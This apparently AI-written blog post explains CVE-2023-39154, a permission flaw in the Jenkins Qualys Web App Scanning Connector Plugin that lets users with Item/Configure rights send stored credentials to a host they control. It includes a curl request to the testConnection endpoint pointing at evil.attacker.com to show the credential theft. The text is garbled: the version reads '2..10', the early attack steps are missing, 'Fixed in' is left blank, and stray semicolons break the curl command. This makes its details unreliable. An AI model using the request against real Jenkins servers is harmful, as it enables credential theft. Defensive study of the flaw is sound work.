CVE-2023-39154 - Exploiting Improper Permission Checks in Jenkins Qualys Web App Scanning Connector Plugin

Jenkins is a widely-used automation server in the DevOps world, helping developers deploy code and automate tasks. But sometimes, plugins meant to make life easy can turn into the weakest link in your security. One such vulnerability—CVE-2023-39154—was found in the Jenkins Qualys Web App Scanning Connector Plugin, versions 2..10 and earlier. In this post, I’ll break down how this flaw can leak your Jenkins credentials, share example code, and point you to references for further research.

What Is CVE-2023-39154?

This vulnerability allows attackers with the global Item/Configure permission in Jenkins to use the Qualys Web App Scanning Connector Plugin to make network requests to any URL they control—using any stored Jenkins credentials they know the ID of (assuming they’ve discovered those credential IDs by other means, such as social engineering or an insecure plugin).

Root Cause:  
The plugin doesn’t properly check if the user should be allowed to access the credentials or connect to arbitrary URLs. Jenkins should require more specific permissions for using a credential in this context, but the plugin allows "over-broad" access.

What Could Go Wrong?

- An attacker with Item/Configure rights (not the most powerful role, but widely available) can:

Capture the credential when Jenkins makes the outbound connection using it.

Put simply: If someone gets configure rights, they can steal any stored Jenkins credential.

Attacker sets up a fake HTTPS server under their control.

3. Within Jenkins, attacker invokes the test functionality of the plugin (like "Test Connection" button) with:

Their chosen credential ID.

4. Plugin connects to attacker’s server using those credentials (could be API keys, cloud tokens, etc), exposing them.

Code Snippet: Post Request Example

The vulnerable endpoint in Jenkins is typically a /descriptorByName/.../testConnection endpoint. Here’s a conceptual curl example simulating what happens under the hood:

curl -u attacker:password \
  -X POST 'https://jenkins.example.com/descriptorByName/com.qualys.jenkins.plugins.wasc.QualysWebAppScan/testConnection'; \
  --data-urlencode 'webappUrl=https://evil.attacker.com'; \
  --data-urlencode 'credentialsId=secret-jenkins-creds-id'

What happens: The plugin uses the supplied credentials to authenticate to https://evil.attacker.com, and the attacker’s server grabs the credential data.

Why Is This So Dangerous?

- Permissions: You don’t need to be a Jenkins admin—just someone with Item/Configure rights, which are common in many Jenkins setups.
- No user notification: Jenkins won’t alert most users/admins that credentials were exfiltrated.

Prevention & Patch

Fixed in:

Permanent mitigations

- Control who has Item/Configure in Jenkins.

Use monitoring to detect outbound traffic to unexpected hosts from Jenkins master.

## More Info / References

- Jenkins Security Advisory - CVE-2023-39154
- Qualys Web App Scanning Connector Plugin
- NVD Entry for CVE-2023-39154
- Jenkins Credentials Security Best Practices

Conclusion

CVE-2023-39154 is a textbook case of why every plugin needs strong permission checks around credential use. In Jenkins, even "lower" privileged users can turn a weak point into a full credential spill. With public exploits trivial to make, patch your Jenkins today—don’t trust *any* plugin with your secrets until you vet it.

Stay safe, keep Jenkins locked down, and double-check those plugins!

*Exclusive content by AI. For more security analysis, follow updates on Jenkins Security Advisories.*

Timeline

Published on: 07/26/2023 14:15:00 UTC
Last modified on: 07/31/2023 18:13:00 UTC